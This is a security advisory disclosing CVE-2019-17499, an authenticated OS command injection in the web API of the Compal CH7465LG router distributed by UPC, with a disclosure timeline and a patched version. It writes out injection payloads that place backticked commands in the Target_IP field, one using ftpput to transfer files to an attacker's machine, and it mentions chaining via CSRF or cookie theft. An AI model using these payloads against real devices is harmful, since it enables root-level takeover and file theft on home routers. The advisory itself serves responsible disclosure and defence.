VENDOR: COMPAL MODEL: CH7465LG? VERSION: CH7465LG-NCIP-6.12.18.25-2p4-NOSH CVE: CVE-2019-17499 CVSS: 9.1 AUTHOR: zaeek (sec@gbti.pl) FIXED IN: Version 6.12.18.25-2p6 [Discovery Genesis] During one of penetration tests done to one of our customers, we've stumbled upon quick audit of a router device delivered by polish ISP (UPC), made by "Compal" with device model "CH7465LG". The following write-up contains vulnerability we've found in built-in web API. We are confident that all injected commands are executed under 'root' privileges. Even due to lack of some busybox applets like 'wget','nc', we were still able to send/receive files with 'ftpget/ftpput' applets. This research was done without physical access to device motherboard, but we expect to find more vulnerabilities if this device were the main pentest subject. [Affected Component]: Router Web API [Attack Vectors] HTTP POST packet needs to be sent with valid session token to `setter.xml` component. Since there is no input filtering on command injections, it is possible to add additional command to be executed. [Exploitation] Attack must be authenticated to Web Panel/API to gain valid session token. Using this token, he can supply following command to achieve OS command injection (sleep for 10 seconds in this example): token=&fun=126&Type=0&Target_IP=1.1.1.1`sleep 10`&Ping_Size=64&Num_Ping=1&Ping_Interval=1 Attack can receive/send any file from target system to attacker's machine using 'ftpget'/'ftpput' respectively like following (writing file to target system in this example): token=&fun=126&Type=0&Target_IP=1.1.1.1`ftpput localfile remotefile`&Ping_Size=64&Num_Ping=1&Ping_Interval=1 If one could bypass CSRF protection or steal saved cookie, it is possible to make create automated exploit, e.g. triggering malicious script from visited website to execute OS commands on this device. [Timeline] 19/06/2019 - Contacted polish ISP (UPC) and shared vulnerability details 02/07/2019 - ISP contacted vendor and confirmed vulnerability; patching in-progress 17/09/2019 - Patch was created and update is being deployed to customers 07/10/2019 - Public disclosure [Mitigation] Vulnerable code fixed in version 6.12.18.25-2p6. To mitigate this vulnerability, please update this device using official guidelines. [About Us] GBTI SA is a security consulting and penetration testing company which specializes in cybersecurity and vulnerability research.